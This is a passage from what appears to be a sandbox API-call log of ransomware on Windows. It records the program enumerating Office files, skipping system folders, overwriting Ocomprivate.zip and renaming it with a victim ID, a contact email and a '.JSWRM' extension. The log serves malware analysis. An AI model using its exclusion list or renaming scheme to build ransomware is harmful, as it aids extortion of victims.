lpWideCharStr="ocimport.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocimport.dll", lpUsedDefaultChar=0x0) returned 12 [0137.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0137.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0137.564] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OCIntlDate.dll", cAlternateFileName="OCINTL~1.DLL")) returned 1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2=".") returned 1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="..") returned 1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="...") returned 1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="windows") returned -1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="recovery") returned -1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="perflogs") returned -1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="documents and settings") returned 1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="system volume information") returned -1 [0137.564] lstrcmpiW (lpString1="OCIntlDate.dll", lpString2="msocache") returned 1 [0137.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCIntlDate.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCIntlDate.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCIntlDate.dll", lpUsedDefaultChar=0x0) returned 14 [0137.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCIntlDate.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCIntlDate.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCIntlDate.dll", lpUsedDefaultChar=0x0) returned 14 [0137.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0137.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0137.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0137.564] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c7ec45a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c6b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ocmsptls.dll", cAlternateFileName="")) returned 1 [0137.564] lstrcmpiW (lpString1="ocmsptls.dll", lpString2=".") returned 1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="..") returned 1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="...") returned 1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="windows") returned -1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="recovery") returned -1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="perflogs") returned -1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="documents and settings") returned 1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="system volume information") returned -1 [0137.565] lstrcmpiW (lpString1="ocmsptls.dll", lpString2="msocache") returned 1 [0137.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocmsptls.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocmsptls.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocmsptls.dll", lpUsedDefaultChar=0x0) returned 12 [0137.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocmsptls.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocmsptls.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocmsptls.dll", lpUsedDefaultChar=0x0) returned 12 [0137.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0137.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0137.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0137.565] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c7c61f2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c848, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OcOffice.dll", cAlternateFileName="")) returned 1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2=".") returned 1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="..") returned 1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="...") returned 1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="windows") returned -1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="recovery") returned -1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="perflogs") returned -1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="documents and settings") returned 1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="system volume information") returned -1 [0137.565] lstrcmpiW (lpString1="OcOffice.dll", lpString2="msocache") returned 1 [0137.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcOffice.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcOffice.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcOffice.dll", lpUsedDefaultChar=0x0) returned 12 [0137.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0137.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0137.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcOffice.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcOffice.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcOffice.dll", lpUsedDefaultChar=0x0) returned 12 [0137.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0137.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0137.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0137.566] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8126b0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f74a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ocogl.dll", cAlternateFileName="")) returned 1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2=".") returned 1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="..") returned 1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="...") returned 1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="windows") returned -1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="recovery") returned -1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="perflogs") returned -1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="documents and settings") returned 1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="system volume information") returned -1 [0137.566] lstrcmpiW (lpString1="ocogl.dll", lpString2="msocache") returned 1 [0137.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0137.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocogl.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocogl.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocogl.dll", lpUsedDefaultChar=0x0) returned 9 [0137.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0137.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0137.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocogl.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocogl.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocogl.dll", lpUsedDefaultChar=0x0) returned 9 [0137.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0137.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0137.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0137.566] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8126b0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15956, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Ocomprivate.zip", cAlternateFileName="OCOMPR~1.ZIP")) returned 1 [0137.566] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2=".") returned 1 [0137.566] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="..") returned 1 [0137.566] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="...") returned 1 [0137.566] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="windows") returned -1 [0137.566] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="recovery") returned -1 [0137.566] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="perflogs") returned -1 [0137.567] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="documents and settings") returned 1 [0137.567] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="$RECYCLE.BIN") returned 1 [0137.567] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="system volume information") returned -1 [0137.567] lstrcmpiW (lpString1="Ocomprivate.zip", lpString2="msocache") returned 1 [0137.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0137.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ocomprivate.zip", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ocomprivate.zip", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ocomprivate.zip", lpUsedDefaultChar=0x0) returned 15 [0137.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0137.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ocomprivate.zip", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ocomprivate.zip", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ocomprivate.zip", lpUsedDefaultChar=0x0) returned 15 [0137.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0137.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0137.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0137.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0137.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Ocomprivate.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ocomprivate.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.569] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=88406) returned 1 [0137.569] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15950) returned 0x2501e8 [0137.570] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15950, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x15950, lpOverlapped=0x0) returned 1 [0137.577] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.577] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15950, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x15950, lpOverlapped=0x0) returned 1 [0137.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0137.578] CloseHandle (hObject=0x45c) returned 1 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0137.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0137.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0137.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0137.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0137.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0137.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0137.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0137.578] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Ocomprivate.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ocomprivate.zip"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Ocomprivate.zip.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ocomprivate.zip.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0137.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0137.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0137.580] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8126b0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x247ab8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ocpptview.dll", cAlternateFileName="OCPPTV~1.DLL")) returned 1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2=".") returned 1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="..") returned 1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="...") returned 1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="windows") returned -1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="recovery") returned -1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="perflogs") returned -1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="documents and settings") returned 1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="system volume information") returned -1 [0137.580] lstrcmpiW (lpString1="ocpptview.dll", lpString2="msocache") returned 1 [0137.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0137.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocpptview.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocpptview.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocpptview.dll", lpUsedDefaultChar=0x0) returned 13 [0137.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0137.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0137.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocpptview.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocpptview.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocpptview.dll", lpUsedDefaultChar=0x0) returned 13 [0137.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0137.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0137.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0137.580] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c838905, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x55cc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ocppvwintl.dll", cAlternateFileName="OCPPVW~1.DLL")) returned 1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2=".") returned 1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="..") returned 1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="...") returned 1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="windows") returned -1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="recovery") returned -1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="perflogs") returned -1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="documents and settings") returned 1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.580] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="system volume information") returned -1 [0137.581] lstrcmpiW (lpString1="ocppvwintl.dll", lpString2="msocache") returned 1 [0137.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocppvwintl.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 